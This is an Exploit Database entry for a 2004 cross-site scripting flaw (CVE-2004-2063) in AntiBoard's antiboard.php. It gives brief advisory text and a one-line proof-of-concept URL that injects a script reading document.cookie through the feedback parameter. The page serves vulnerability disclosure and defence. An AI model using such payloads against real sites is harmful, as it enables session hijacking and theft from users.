Exploit Database - Logo

AntiBoard 0.6/0.7 - antiboard.php feedback Parameter Cross-Site Scripting

EDB-ID: 24330 Author: Josh Gilmour Published: 2004-07-28
CVE: CVE-2004-2063 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/10821/info
 
Multiple vulnerabilities are reported to exist in the application due to insufficient sanitization of user-supplied data. The issues include various instances of SQL injection and a cross-site scripting vulnerability.
 
AntiBoard versions 0.7.2 and prior are affected by these issues.

/antiboard.php?thread_id=1&mode=threaded&range=&feedback=<script>alert(document.cookie);</script>

Related Exploits

Trying to match CVEs (1): CVE-2004-2063
Trying to match OSVDBs (1): 8269
Other Possible E-DB Search Terms: AntiBoard 0.6/0.7,  AntiBoard 0.6,  AntiBoard
Date D V Title Author
2004-07-28Download Exploit Code Verified AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL InjectionsJosh Gilmour
Menu